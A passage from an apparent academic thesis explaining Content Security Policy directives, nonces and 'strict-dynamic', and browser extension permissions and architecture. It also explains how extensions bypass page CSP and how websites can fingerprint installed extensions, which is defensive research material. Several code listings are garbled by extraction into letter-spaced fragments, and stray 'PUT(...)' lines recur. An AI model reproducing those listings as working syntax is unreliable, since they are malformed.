style-src stylesheets (CSS) embedded with link, style tags

font-src fonts loaded via @font-face property of stylesheets and

FontFace JavaScript API

img-src images inclusion with img tag, poster of video tag

connect-src applies to AJAX requests (XMLHttpRequest, Fetch), Web-

Socket, EventSource

media-src applies to audio, video tags

frame-src,child-src applies to frames loaded with iframe, frame tags

frame-ancestors origins of top-level contexts which can nest the page as an

iframe

form-action applies to the values of the action attribute of HTML form

elements

sandbox sandbox a page and its resources. This is similar to the use

of the sandbox attribute on a iframe (See Section 2.2)

report-uri,report-to endpoints where to submit CSP violations reports (content

in the page not matching the policy)

default-src used as a fallback directive for any type of content, which

directive is not explicitly added to the policy. It applies to

*-src like directives

Table 2.3 – Excerpt of CSP directives and their descriptions

5.2 Directive values

Directive values or source lists are basically the trusted origins from which content can be

loaded from. The CSP specification [261,272,275] defines for each directive, the possible

values that it can have. We give here an overview of possible values commonly used in

directives.

Host expressions

Host expressions are used to whitelist content based on their origins. Hosts can either be

full origins (i.e. https://example.com:8080), origins with paths (https://example.com:

8080/path/), used to whitelist a set of content, or even a specific content (i.e. https:

//example.com/script.js). The scheme part of the origin can be omitted (in which case

it will be assigned the scheme of the page in which the policy is enforced). The domain

name of the origin can contain wildcards (i.e. *.example.com) to include the sub domains

of a higher-level domain. Finally, the port can also be omitted (in which case it corresponds

to the default port of the origin scheme specified, or otherwise the port of the webpage).

The host and port can take the special value *, in which case they match URLs with any

host and port number. The *can appear as a standalone value in a directive. In this case,

PUT(0,-845.90042)

24 CHAPTER 2. BACKGROUND

it allows content from any origin (excluding some local-scheme URIs content, depending

on CSP version). Finally, ’none’ is a special directive value to express that no content are

allowed to load.

The semantics of the host expressions values has evolved between CSP3 and previous

versions [272] w.r.t insecure schemes and ports. In CSP1 and CSP2, insecure (HTTP)

origins allow content only from the exact origin. In CSP3, this origin also allows content

from its secure (HTTPS) counterpart. For instance, whitelisting http://example.com

implicitly also whitelists https://example.com in CSP3.

Schemes

They are used to whitelist content with a specific scheme. For instance, the value https:

in a policy matches any URL whose scheme is https (i.e https://example.com/content).

Common schemes include https:, http:, data:, blob:, wss:, ws:, filesystem: and

mediastream: (the colon is required when specifying schemes in CSPs).

Keywords

CSP defines many keywords with different semantics. The ’self’ keyword is used to

whitelist content from a page’s own origin. One can also directly include the full origin of

the page in the policy to whitelist it.

Inline scripts and DOM event handlers represent the main vector for content injection

attacks. By default, CSP bans the inclusion of inline scripts and DOM event handlers in

webpages. However, the ’unsafe-inline’ keyword can be used to allow the inclusion of

inline scripts and stylesheets. Enabling inline scripts in particular makes a CSP ineffective

against attacks [177,214,267].

JavaScript has many functions that can be used for turning strings into code. This in-

cludes eval, setInterval, setTimetout, Function (See Section 1.5). Such functions

are banned by default from policies. The specification however defines the ’unsafe-inline’

keyword (to be used with script-src and style-src directives), in order to renable the

use of these functions.

One of the reasons that hindered a wider adoption of CSP was the lack of a mechanism

for easily accommodating dynamically injected scripts. Weichselbaum et al. [267] then

proposed the ’strict-dynamic’, a keyword to be used to allow scripts whitelisted with

nonces or hashes, to further dynamically inject additional scripts even if they are not

explicitly whitelisted in a policy. In anterior CSP versions, for a dynamic script to be

allowed to load, it must have matched the policy of the page. In CSP3, if the dynamic

script is loaded from a script which is already loaded (because it matches the policy), then

the dynamic script is allowed to load, even though it does not match the policy. When the

’strict-dynamic’ keyword is used in a policy, we refer to the overall policy as a strict

CSP.

Directives which do not rely on hosts and schemes have dedicated keywords. For in-

stance, the values of the sandbox directive are those defined by the HTML specifica-

tion for the sandbox attribute of iframes and includes among others, allow-scripts,

allow-same-origin and allow-forms [76] (See Section 2.2). The values set to the directive

plugin-types are MIME types [96] of content and include for instance application/pdf

(for PDF documents), application/x-shockwave-flash (for Adobe Flash plugins), text/html

(for HTML documents), text/css (for CSS files), image/png, image/jpeg, image/gif

(for images of type PNG, JPEG, and GIF respectively), etc.

PUT(0,-845.90042)

5. CONTENT SECURITY POLICY 25

Nonces and hashes

Nonces and hashes have been introduced starting from CSP2 mainly to allow the whitelist-

ing of individual inline scripts and stylesheets. So far, there is no way to whitelist individual

DOM event handlers using nonces, or hashes11 . The use of nonces improves on the effec-

tiveness of CSPs regarding inline scripts [272,275] by allowing browsers to distinguish

between trusted scripts and attacker code. Comparatively, the use of ’unsafe-inline’ in

a policy automatically makes CSP ineffective against attacks. [177,214,267].

A nonce is a token, randomly generated using strong cryptographic routines in order to

prevent an attacker from guessing the nonce in advance [275]. To whitelist a script with

a nonce, the nonce is added to the script-src directive, and also as a value of the nonce

attribute of the corresponding <script> tag in the page. A single nonce can be assigned

to multiple scripts.

To whitelist a script or stylesheet with a hash, one computes the hash of the script of

stylesheet content using Secure Hash Algorithms (SHA) [126]. Then, the hash is encoded

in base64 and added to the script-src or style-src directive. Hence, when the browser

encounters a script or stylesheet in the page, it will compute its hash, and compare it with

the whitelisted ones in the policy. If there is a match, the script or stylesheet is allowed to

execute, otherwise it is blocked.

Precedence of directives values

It is worth mentioning the case of policies that combine ’strict-dynamic’, with non-

ces/hashes and the ’unsafe-inline’ keyword. Consider the policy shown in Listing 2.10.

scr i p t- s rc ’strict-dynamic’ ’nonce-random123’ t r us t ed . co m h tt p s :

’ u ns a f e- i n li n e ’

Listing 2.10 – CSP differently enforced depending on the version

— In CSP3, only ’strict-dynamic’, the nonces and hashes are considered. We refer to

polices with nonces and ’strict-dynamic’ as strict CSPs. In strict CSP, the hosts,

schemes, ’self’ and ’unsafe-inline’ keywords are ignored. So a script is allowed

to load if it has a valid nonce or hash, or if it is dynamically injected by a script

which has already loaded (thanks to ’strict-dynamic’).

— In CSP2, ’strict-dynamic’ is ignored. If nonces or hashes are declared, ’unsafe-inline’

is also ignored. Other values are enforced, including nonces, hashes, hosts, schemes,

and other keywords.

— Finally, in CSP1, nonces, hashes and ’strict-dynamic’ are discarded. Hosts,

schemes, others keywords such as ’unsafe-inline’ are enforced.

5.3 CSP modes and headers

A CSP to be enforced on a webpage is deployed either as an HTTP response header, or

in the HTML response body of the webpage using a <meta> tag. The name of the CSP

header depends on the mode of deployment. There are 2 modes. In the report-only mode,

the browser does not prevent a content that do not match the policy from loading. These

content are simply reported to the developer at the reporting endpoint specified in the

policy with the report-uri or report-to directives (See Table 2.3). To deploy a CSP in

report-only mode, one uses the Content-Security-Policy-Report-Only header.

11. There is draft proposal in the current CSP3 [272], to be able to use hashes for whitelisting individual

DOM event handlers. This mechanism is however not yet implemented by browsers

PUT(0,-845.90042)

26 CHAPTER 2. BACKGROUND

In the dual enforcement mode, content that do not match the policy are effectively blocked,

before being reported. The Content-Security-Policy can be used to deploy a policy in

enforcement mode 12.

The <meta> has some restrictions. Report-only policies are not enforced when delivered

in the <meta> tag. Moreover, even when delivered in enforcement mode, the sandbox and

frame-ancestors directives are ignored by the browser when a policy is delivered in the

<meta> tag.

CSP allows to deploy and enforce many policies on the same page. One can either deploy

multiple policies in a single header by separating them with a comma, or send multiple

headers (report-only or enforcement mode), each with a single or set of policies. In any

case, multiple policies are all individually enforced. A content is allowed to load if it is

allowed by all of the policies.

5.4 Example of CSPs

We present here different examples of policies.

Origin-based policies

Listing 2.11 presents a CSP where scripts are whitelisted based on their origins. We call

them origin-based policies.

scr i p t- s rc t r us t ed . c om r e di r ec t . c om p a rt i a ls . c o m / sc r i pt s / ;

img-src https:

Listing 2.11 – Example of an origin-based CSP

Only scripts from the explicitly specified origins are allowed to load in the webpage on

which this policy will be deployed. Assume that this policy is deployed on a page with the

URL https://example.com, then the injection of a script with URL https://trusted.

com/script.js in the webpage is allowed since the script comes from the whitelisted origin

trusted.com. Images can be loaded from any secure domain. No restrictions are set on

other types of content.

Nonce-based policies

Listing 2.12 shows a nonce-based policy.

scr i p t- s rc ’ n o n ce - r an d om 1 2 34 5 ’ ’ s tr i c t- d y na m ic ’ ;

Listing 2.12 – Example of CSP with nonces

Nonces are used to whitelist individual scripts. To allow a script to load, one injects

the page (Note the use of the nonce attribute which value is a nonce whitelisted in the

policy of the page).

With the presence of the ’strict-dynamic’ keyword, scripts that load can further dy-

namically inject additional non-parser-inserted scripts. Listing 2.13 shows an example of a

parser inserted script, that will fail to load in presence of ’strict-dynamic’.

document.write(’<script s rc = " h t tp s : / / e x am p l e .c o m / s c r ip t . js " ) ;

Listing 2.13 – Parser-inserted script

12. In CSP1, the CSP headers were prefixed with X-. The X-Webkit-CSP was also used for delivering

policies

PUT(0,-845.90042)

6. BROWSER EXTENSIONS 27

To load dynamic scripts, one can inject them as shown in the following Listing 2.14.

var script =document.createElement(" script") ;

scr i p t. s rc =" h tt p s: / / e xa m pl e .c o m / sc r ip t. j s ";

document.body.appendChild(script);

Listing 2.14 – Non-parser-inserted scripts

Contrary to the CSP in Listing 2.11 where one knows the exact origins from which content

can load, in the case of strict CSP, scripts that effectively load are known only at runtime.

Delivering policies

Listing 2.15 shows the deployment of a CSP in enforcement mode in an HTTP header.

C on te nt - Se cu r it y -P ol ic y: d ef a ul t- s rc h tt ps : //cdn.example.net;

c hi l d - sr c ’ n on e ’; o b j ec t - s rc ’ n o ne ’

Listing 2.15 – Delivering CSP in HTTP header

Listing 2.16 shows the same policy delivered in an HTML meta tag.

<met a http-equiv="Content-Security-Policy" content="default-src

h tt p s : / / c d n. e x a m pl e . n e t; c hi l d - sr c ’ n o ne ’; o b j ec t - s rc ’ n o ne ’ "

Listing 2.16 – Delivering CSP in HTML meta tag

6 Browser extensions

Browser extensions or addons are third party programs, that users can download and

add to their browsers, to extend the functionality of browsers, and improve their brows-

ing experience. Irrespective of the browser, the concept of addons or extensions always

convey similar characteristics: browser extensions have access to elevated browser APIs,

that are not accessible to traditional web applications. In the past, many vendors were

providing specific technologies for building extensions that would only run on their own

browsers [25,110,134,156]. The WebExtensions API [100] is a cross-browser system, for

developing extensions using standard HTML, JavaScript and CSS languages, that can run

on many browsers including Google Chrome, Opera, Mozilla Firefox and Microsoft Edge.

Interestingly, their specific extensions APIs [2,25,100,110] are compatible with each other

to some extent, making it easy to migrate extensions written for a specific browser to other

browsers with just a few changes. In the rest of this thesis, unless otherwise specified, when

we talk about extensions or addons, we mean cross-browser WebExtensions.

Extensions execute in browsers with elevated privileges. For instance, they can inject scripts

(content scripts) to manipulate the DOM of web pages running in the user browser. They

are not subject to the Same Origin Policy [125] with respect to their ability to make cross-

origin requests. Hence, they can make requests with user credentials to get data from any

web application server (See Section 3on cross-origin requests). They have access to user

information stored in the browser such as their cookies, browsing history, bookmarks,etc.

They have access to a permanent storage in which data can be persistently stored as long

as the extension is installed in the user browser. Examples of popular browser extensions

are adblockers, such as AdBlock [6] and password managers, such as LastPass [86].

PUT(0,-845.90042)

28 CHAPTER 2. BACKGROUND

6.1 Security considerations

Because of the privileged browser features they have access to, extensions represent valuable

targets for attackers. To limit the harm that attackers could cause if they compromise an

extension, extensions must declare, in a mandatory manifest.json file, permissions for

the APIs that they effectively use in the extension code. Listing 2.17 shows an example

of a manifest file and the permissions (features and APIs) the extension will be granted

access to at runtime.

{

"permissions": [

" < a ll _ u r ls >",

"storage",

" m a na g e m en t " ,

"cookies",

"history",

" b oo k ma rk s " ,

" d ow n lo ad s " ,

" w e bR e q u es t " ,

" w eb R eq u es t Bl oc ki n g "

]

}

Listing 2.17 – Permissions declaration in a manifest file

These are only a subset of all the capabilities provided by browsers to extensions. When

installed, this extension will be granted full access (read/write) to data on any web ap-

plication, thanks to the permission <all_urls>, called the host permission. This implies

that if the user is logged into a web application (mailing, banking, social networks, ...),

the extension also has access to the user’s private data on that application. The rest of

the permissions read straightforwardly. The storage permission allows the extension to

store and retrieve data in the browser. The permissions management,cookies,history,

and bookmarks give the extension the permission to access and manage the list of installed

extensions, cookies, the user’s browsing history and bookmarks respectively. With the

downloads permission, the extension can download and save arbitrary files in the user’s

device. The webRequest and webRequestBlocking permissions give an extension the abil-

ity to intercept and tamper with HTTP communications between web applications and web

servers. In particular, it can add or remove HTTP headers in requests and responses [28,59].

6.2 Architecture

Extensions are made up of in 3 main parts or components.

...

" b ac k gr o un d " : {

"scripts": [ " b a ck g ro u nd . js " ]

"content_scripts": [{

"matches": [ " < a ll _ ur l s >"],

"scripts": [ " c o nt e nt _ sc r ip t s. j s "]

}] ,

"browser_action": {

"default_icon":" i co n .p n g " ,

" d ef a ul t _p op u p ":" p o pu p .h t m "

}

PUT(0,-845.90042)

6. BROWSER EXTENSIONS 29

...

Listing 2.18 – Declaring different components of an extension in the manifest file

Listing 2.18 shows the declaration of different components of an extension: the scripts that

will execute in the extension background page, the content scripts that will be injected in

all web pages, and a UI page (browser action) with an icon, which once clicked, will display

a popup for the user to customize the extension for example.

There is a separation in privileges among the different components of an extension. More

importantly, webpages and extensions execute in separate contexts. In the contexts of

extensions components, extensions specific APIs are all accessible via the chrome object in

Chrome and Opera browsers [25,110], and via the browser object in Firefox and Microsoft

Edge [2,100]. The chrome or browser object are properties of the global object window (See

Section 1.5). The document object allows background scripts to manipulate the background

page DOM, the UI pages scripts to manipulate the UI page DOM, and the content scripts

to manipulate the webpage DOM

— The background page runs the main logic of the extension. It is composed of a set

of scripts that execute in the background, without any visual UI. Scripts running

in the background page have access to all the permissions of the extension. The

background page is in fact an HTML page, which can be directly declared in the

manifest.json file [14]. When only its scripts are declared (as in our example), the

browser generates an HTML page in which the scripts are executed.

— UI pages are meant for the user to interact with the extension, in order for instance,

to enable, disable it or customize its behavior with specific settings, etc. Background

and UI pages have direct access to each other’s DOM and execution contexts.

— Content scripts are injected by the browser to run along webpages. Content scripts

run in a separate context, different from the context of background pages, and dif-

ferent also from the context of web pages in which they are injected. Even though

they are not granted access to all the extension capabilities, they can directly use

the host and storage permissions to access user data on any web application or to

store and retrieve data from the extension storage. Content scripts can manipulate

the webpage DOM, and the changes they make to the DOM are visible to scripts

executing in the context of webpages. Changes made to the DOM by the webpage

are also visible to content scripts. They share the same HTML5 localStorage as web-

pages (note that this is different from the extension storage which they also share

with the rest of the extensions components).

6.3 Extensions injected content

Listing 2.19 shows the injection of a script in a webpage, done by the content script.

var script =document.createElement(" script") ;

scr i p t. s rc =" h tt p s: / / e xa m pl e .c o m / sc r ip t. j s "

document.body.appendChild(script)

Listing 2.19 – Content injection in webpages DOM

Content injected in the DOM of webpages are visible to the page. In the particular case

of scripts, they are executed in the context of the page and not that of the content scripts.

Content injected by the content scripts are not restricted by the CSP of the page. That

is, the script injected as shown in Listing 2.19 will execute in any page, regardless whether

the CSP of the page does not allow content from https://example.com. This is the case

PUT(0,-845.90042)

30 CHAPTER 2. BACKGROUND

for any other remote content injected in the webpage by the extension. However, let’s take

an example wherein, a content scripts injects a script Ain the page. Awill load because it

is not applied the CSP of the page. Any content that Ain turn attempts to inject will be

applied the CSP of the page [26,200].

6.4 Extensions identification

Each extension in browsers supporting the WebExtensions API [100], is assigned a unique

identifier that helps to distinguish it from other extensions the user has installed. In Chrome

and Opera (and related browsers), the unique identifier is the same and is permanent for

the extension regardless of the browser in which it is installed. For instance, the uBlock

Origin [140] extension is assigned the identifier cjpalhdlnbpafiamejdnhcphjbkeiagm in

any Chrome browser in which it is installed. On any Opera browser, its unique identifier

is kccohkcpppjjkkjppopfnflnebibpida [142]. On the contrary, Firefox has adopted a

completely different approach: an extension is assigned a randomly unique identifier, called

the UUID, when it is installed in a Firefox browser13 . As a consequence, the uBlock Origin

extension in Firefox will be assigned a different browser-specific identifier for each browser

in which it is installed. This identifier remains unique as long as the extension is installed

in the browser. In our browser, a813af59-53ff-4845-bc98-1b820a790ff5 is the identifier

of uBlock Origin [141].

6.5 Web Accessible Resources

Web accessible resources (WARs) are content in the extension bundle (package) that the

extension intents to inject in the DOM of web pages [57,63]. As we have mentioned

previously, content scripts have access to the page DOM, which they can modify by injecting

content. Such content can be located on remote servers, or located in the extension package

on the user browser. Browsers impose that the extension explicitly declares the content of

its package that can be injected in web pages. In the manifest.json file, these content

are declared using the web_accessible_resources key as shown by Listing 2.20.

{

"web_accessible_resources": [ " i m a ge s /* . p n g " ," s cr i p ts / * "]

}

Listing 2.20 – Declaring web accessible resources (WARs) in the manifest file

Web accessible resources injected in web pages have the following schema.

[ E xt - Sc h em e ] : // [ E x t -I D ]/ [ p a th ]

Listing 2.21 – Scheme of extensions web accessible resources URLs

The Ext-Scheme is the scheme used for extension bundle resources. Chrome and Opera

use chrome-extension scheme (protocol) while Firefox uses moz-extension. The Ext-ID

is the unique identifier of the extension. Finally path is the path to the web accessible

resource itself in the extension bundle.

Browsers provide a convenient way for content scripts to inject resources in web pages by

specifying only the path to the resource. By invoking chrome.runtime.getURL("icon.png"),

the browser will generate the URL of the resource icon.png, by prepending it with the

scheme, and the extension identifier as shown in Listing 2.21.

13. In reality, Firefox extensions also have another identifier, which is permanent as in the case of Chrome.

It is used among other things, to update extensions [52] and not for the extension (resources) identification

we are going to discuss here

PUT(0,-845.90042)

6. BROWSER EXTENSIONS 31

If web accessible resources can be injected by content scripts in web pages, nothing pre-

vents a script in a webpage from also loading a WAR. On Chrome and Opera, extensions

identifiers are publicly known. All browsers have a centralized place where extensions can

be downloaded and installed in the user’s browser [24,58,94,108].

By downloading an extension, one has access to its source code and one can know whether

the extension has web accessible resources or not. There are extensions such as the CRX

Extension Viewer [277] which lets one display and navigate the source code of other exten-

sions, directly in a browser. Knowing the extension unique identifier and web accessible

resources allow a webpage to also load web accessible resources and detect the presence of

extensions that a user has installed in her browser [198,245,249].

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Part I

Content Security Policy

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Introduction

Content Security Policy has been first proposed by Stamm et al. [258] and standardized by

the W3C, as a refinement of SOP [125], in order to help mitigate Cross-Site-Scripting [278]

and data exfiltration attacks.

Since its introduction [275], CSP has gained significant consideration from the research

community, with propositions aimed at improving its effectiveness and security [177,267].

The second version [275] of the specification is supported by all major browsers, and the

third version [272] is in an advanced development state. CSP adoption on websites in the

wild is growing, even though slowly [177,255,267,269]. To help improve CSP adoption,

many tools have been proposed [214,235,236].

CSP adoption measurements Even though CSP is well supported by browsers [177], its

endorsement by web sites is rather slow. Weissbacher et al. [269] performed the first large

scale study of CSP deployment in top Alexa sites, and found that around 1% of sites were

using CSP at the time. Calzavara et al. [177] found that nearly 8% of Alexa top sites had

CSP deployed in their front pages in 2016. Another study, by Weichselbaum et al. [267]

come with similar results to the study of Weissbacher et al. [269].

Tools to ease CSP adoption Almost all authors agree that CSP adoption is not a

straightforward task, and lots of (manual) effort are needed in order to reorganize and

modify web pages to support CSP. Therefore, in order to help web site developers in

adopting CSP, Javed proposed CSP Aider [209] that automatically crawls a set of pages

from a site and proposes a site-wide CSP. Patil and Frederik [236] proposed UserCSP,

a framework that monitors the browser internal events in order to automatically infer a

CSP for a web page based on the loaded resources. Pan et al. [235] proposed CSPAuto-

Gen, to enforce CSP in real-time on web pages, by rewriting them on the fly client-side.

Weissbacher et al. [269] have evaluated the feasibility of using CSP in report-only mode

in order to generate a CSP based on reported violations, or semi-automatically inferring

a CSP policy based on the resources that are loaded in web pages. They concluded that

automatically generating a CSP is ineffective. Another difficulty is the use of inline scripts

in many pages. The first solution is to externalize inline scripts, as can be done by systems

like deDacota [184]. Kerschbaumer et al. [214] find that too many pages are still using

’unsafe-inline’in their CSPs. They propose a system to automatically identify legiti-

mate inline scripts in a page, thereby whitelisting them in the CSP of the underlying page,

using script hashes.

Evaluating CSP effectiveness Another direction of research on CSP, has been evaluating

its effectiveness at successfully preventing content injection attacks. Calzavara et al. [177]

found out that many CSP policies in real web sites had errors including typos, ill-formed

or harsh policies. Even when the policies were well formed, they found that almost all

deployed CSP policies were bypassable because of a misunderstanding of the CSP language

itself. Johns [212] first demonstrated that insecure JSONP endpoints can lead to bypasses,

and proposed a server-side templating mechanism for safely assembling code and data to

PUT(0,-845.90042)

prevent such attacks. Weichselbaum et al. [267] also showed many other subtle bypasses

which make CSP ineffective at preventing attacks. Patil and Frederik found similar errors

in their study [236]. Van Acker et al. [168] have shown that CSP fails at preventing data

exfiltration specially when resources are prefetched, or in presence of a CSP policy in the

HTML meta tag, because the order in which resources are loaded in a web application is

hard to predict. Hausknecht et al. [200] found that some browser extensions, modified the

CSP policy headers, in order to whitelist more resources and origins. This can potentially

alter the effectiveness of CSP at mitigating attacks.

Improving CSP Expressiveness Johns [211] proposed hashes for static scripts, and

PreparedJS, an extension for CSP, in order to securely handle server-side dynamically

generated scripts based on user input. Weichselbaum et al. [267] have extended nonces and

hashes, introduced in CSP level 2 [275], to remote scripts URLs, specially to tackle the high

prevalence of insecure hosts in current CSP policies. They proposed whitelisting scripts

with nonces and hashes instead of origins, to prevent bypasses due to JSONP and open

redirects. They first introduced strict CSP, and more specifically the ’strict-dynamic’

keyword for easily loading dynamic content. This keyword states that any additional script

loaded by a whitelisted script is considered a trusted script as well. They also provide

guidelines on how to build an effective CSP. Nonces are included in the DOM, and their

security is questionable. Furthermore, the trust propagation enabled by ’strict-dynamic’

only applies to scripts and stylesheets, and is too liberal since it allows any whitelisted script

to further inject any other script without restrictions. To limit this trust propagation,

Calzavara et al. [178] proposed Compositional Content Security Policy (CCSP). In their

proposal, scripts which are included in the application are individually whitelisted in the

CSP of the application, instead of whitelisting their origins. Furthermore, each of them is

assigned an upper bound in the additional content it can further inject in the application.

The upper bound is a CSP specifying which additional content a whitelisted script can

further load. Besides requiring adoption by the CSP specification, CCSP also requires

content providers to declare all the dependencies needed by content that they host. This

helps developers build the upper bounds when including such content in their policies.

CSP and SOP

CSP is a page-specific policy. Jackson and Barth [208] have shown that page-specific

policies can be bypassed by origin-wide policies. Though, their work predates CSP. In

our work [255] presented in Chapter 3we demonstrate that this also applies to CSP, by

analyzing the interactions between CSP (a page-specific policy) and the SOP (an origin-

wide policy). The SOP allows same-origin pages to directly access each other execution

contexts. When same-origin pages do not set the same CSP restrictions on scripts they

load, then when one page embeds another as an iframe, CSP violations can occur. In these

settings, the deployed CSP becomes ineffective against attacks propagating from same-

origin pages not protected with CSP. To effectively protect a web page against attacks

with a CSP, one then has to ensure that same-origin pages it embeds are also protected

against attacks, otherwise, an attacker can target such pages, and propagate the attack to

CSP-protected pages thanks to the Same Origin Policy. We also extend previous results on

CSP measurements by analyzing the adoption of CSP by site, not only considering front

pages but all the pages in a site. We have been regularly (monthly) collecting statistics

about CSP adoption on top 10k Alexa sites. Figure 2.1 shows the evolution on CSP

adoption. It is interesting to note a constant growth in CSP adoption among top sites

homepages. In April 2016, only 2.1% of them had adopted CSP. A year later, in April

PUT(0,-845.90042)

2017, it is 3.8% of them which had CSP deployed. Finally, in April 2018, 7.3% of top 10k

Alexa sites deploy CSP. This result is very encouraging from a security perspective. Even

though they may be changes in the sites which are in the top 10k sites, we can say that

popular websites owners are more and more aware of CSP.

April, 2016

May, 2016

June, 2016

July, 2016

August, 2016

September, 2016

October, 2016

November, 2016

December, 2016

January, 2017

February, 2017

March, 2017

April, 2017

May, 2017

June, 2017

July, 2017

September, 2017

October, 2017

November, 2017

December, 2017

January, 2018

February, 2018

March, 2018

April, 2018

May, 2018

Figure 2.1 – Evolution of CSP adoption among top 10,000 Alexa Sites between April 2016

and April 2018 - Source [153]

Dependency-Free CSP

CSP has three versions: CSP1 [261], CSP2 [275] and CSP3 [272]. Each version builds

on the previous one, adding more features, modifying the semantics of some or removing

others. Furthermore, not all browser vendors are implementing the same version of CSP,

and not all implementations are compliant with the specification.

As an application developer, one has to ensure that a CSP deployed with a page, will

successfully protect it against attacks, and preserve the functionality of the application,

no matter the browser in which the application executes, and the specific implementation

of CSP in the browser. This area has so far received no attention. In Chapter 4, we

fill this gap by formalizing the differences in CSP versions and browsers implementations

as CSP directives dependencies. Then we propose a set of rewriting rules and a tool for

developers to build dependency-free policies (DF-CSP) whose semantics are independent of

CSP versions and browsers implementations. Such policies help to protect applications

against attacks while preserving their functionality in all browsers.

Dependency-free policies are also useful to reason about CSP policies with the formal

semantics of Calzavara et al. [179] that calculates the global meaning of CSP policies by

adding the meanings of each individual directive. In this formal semantics, the global

semantics of a CSP policy follows from the semantics of individual directive values. This

is however not correct unless the CSP does not present any dependencies, because the

meaning of individual directives could be altered by other directives.

PUT(0,-845.90042)

Finally, we discuss the security implications of the use of ’strict-dynamic’ in poli-

cies [267,272]. In fact, the use of ’strict-dynamic’ in backwards compatible policies

such as DF-CSP, can give attackers different attack power depending on the version of CSP

considered, especially in CSP3 where an attacker could potentially inject arbitrary con-

tent in the application. We show that automatically generating a second policy out of

a policy that makes use of ’strict-dynamic’, successfully ensures that an attacker who

compromises a script allowed by a DF-CSP, does not gain more power, irrespective of the

browser in which the application executes. This limits the trust propagation mechanism of

CSP [267] with a global upper bound for all scripts in the page. This is different from the

proposal of individual upper bounds proposed by Calzavara et al. [178] with the advantage

of requiring no modification to the current CSP specification.

CSP limitations: proposals for extending the specification

Previous works have demonstrated limitations of CSP [177,178,211,267], as a whitelisting

mechanism. An origin added to a policy implies that any content from that origin is

trusted. In fact, it is not possible to exclude (blacklist) specific content, even though one

knows that they are potentially malicious. The only solution would be, to individually

whitelist the trusted content, except the untrusted ones. In addition to being impossible

in case only specific content are untrusted, partially whitelisting an origin is bypassable

using HTTP redirections [267,272,275]. Moreover URLs parameters are considered safe

by default. Nonetheless, many attacks have been demonstrated, where attackers leverage

URL parameters to bypass CSP [211,267]. Browser extensions are widespread and can

alter the CSP of webpages, introducing vulnerabilities in webpages [200]. The use of

’strict-dynamic’ makes it difficult to assess what content will effectively load in the

page.

Weichselbaum et al. [267] proposed the use of nonces to mitigate CSP bypasses. This

solution has however many shortcomings. First, the security of nonces has been ques-

tioned [178,272,275]. They do not mitigate attacks done by whitelisted scripts, especially

when they get compromised. Finally, nonces apply only to scripts and stylesheets. The

CSP violations reporting mechanism fails at successfully reporting all content that effec-

tively load in a webpage, because it is inefficient (require the deployment of two policies)

and incomplete (do not report content injected by browser extensions).

In Chapter 5, we propose extending CSP specification in order to successfully address the

aforementioned issues. To do so, we discuss 4 extensions to the current CSP specification:

the ability to blacklist content, express more fine grained checks on URL arguments, ex-

plicitly prevent redirections to partially whitelisted origins, and a reporting mechanism for

content that are allowed by a CSP enforced on a webpage. While requiring few changes to

the specification, these extensions successfully mitigate the shortcomings of CSP in its cur-

rent state and attacks that have been demonstrated in the wild. The reporting mechanism

provides an efficient way for collecting useful feedback about the runtime enforcement of

CSP as done by the browser, and can help improve the effectiveness of policies deployed to

protect webpages. Finally, we demonstrate an implementation of the proposed extensions

using service workers.

PUT(0,-845.90042)

Chapter 3

Content Security Policy and the Same Origin Policy

Preamble

This chapter describes the interplay between the Content Security Policy (CSP) mechanism

and the Same Origin Policy. In particular, CSP is a page-specific policy, while the SOP

applies to all same-origin pages. We show how CSP may be violated due to the SOP when

a page has a CSP, but other same-origin pages it can directly interact with (say, a parent

page and its same-origin iframes) do not have CSP. This chapter is a replication of the

paper titled "On the Content Security Policy Violations Due to the Same-Origin Policy"

which was published in the proceedings of the 26th International Conference on World

Wide Web (WWW) in 2017.

1 Introduction

In this chapter, we report on a fundamental problem of CSP. CSP [275] defines how to

protect content in an isolated page. However, it does not take into consideration the page’s

context, that is its embedder or embedded iframes. In particular, CSP is unable to protect

content of its corresponding page if the page embeds (using the src attribute) an iframe

of the same origin. The CSP policy of a page will not be applied to an embedded iframe.

However, due to SOP, the iframe has complete access to the content of its embedder.

Because same-origin iframes are transparent due to SOP, this opens loopholes to attackers

whenever the CSP policy of an iframe and that of its embedder page are not compatible

(see Figure. 3.1).

Figure 3.1 – An XSS attack despite CSP.

PUT(0,-845.90042)

40 CHAPTER 3. CSP VIOLATIONS DUE TO SOP

We analyzed 1 million pages from the top 10,000 Alexa sites and found that 5.29% of

sites contain some pages with CSPs (as opposed to 2% of home pages in previous stud-

ies [177]). We identified that in 94% of cases, CSP may be violated in presence of the

document.domain API and in 23.5% of cases CSP may be violated without any assump-

tions (see Table 3.2).

We also identified a divergence among browsers implementation of the enforcement of

CSP [275] in sandboxed iframes embedded with srcdoc. This actually reveals an inconsis-

tency between the CSP and HTML5 sandbox attribute specification for iframes.

We identify and discuss possible solutions from the developer point of view as well as new

security specifications that can help prevent this kind of CSP violations. We have made

publicly available the dataset that we used for our results in [42]. We have installed an

automatic crawler to recover the same dataset every month to repeat the experiment taking

into account the time variable. An accompanying technical report with a complete account

of our analyses can be found at [253].

In summary, our contributions are: (i) We describe a new class of vulnerabilities that

lead to CSP violations. (Section 1). (ii) We perform a large and depth scale crawl of top

sites, highlighting CSP adoption at sites-level, as well as sites origins levels. Using this

dataset, we report on the possibilities of CSP violations between the SOP and CSP in

the wild. (Section 3). (iii) We propose guidelines in the design and deployment of CSP.

(Section 6). (iv) We reveal an inconsistency between the CSP specification and HTML5

sandbox attribute specification for iframes. Different browsers choose to follow different

specifications, and we explain how any of these choices can lead to new vulnerabilities.

(Section 5).

2 Content Security Policy and SOP

CSP is a page-specific policy. A CSP delivered with a page controls the resources of the

page. However it does not apply to the page’s embedding resources [275]. As such, CSP

does not control the content of an iframe even if the iframe is from the same origin as the

main page according to SOP. Instead, the content of the iframe is controlled by the CSP

delivered with it, that can be different from the CSP of the main page.

2.1 CSP violations due to SOP

Consider a web application, where the main page A.html and its iframe B.html are located

at http://main.com, and therefore belong to the same origin according to the Same Origin

Policy [125]. A.html, shown in Listing 3.1, contains a script and an iframe from main.com.

The local script secret.js contains sensitive information given in Listing 3.2. To protect

against XSS, the developer has installed the CSP for its main page A.html, shown in

Listing 3.3.

< ht ml >

...

</html>

Listing 3.1 – Source code of http://main.com/A.html.

var secret =" 42 " ;

Listing 3.2 – Source code of secret.js.

PUT(0,-845.90042)

2. CONTENT SECURITY POLICY AND SOP 41

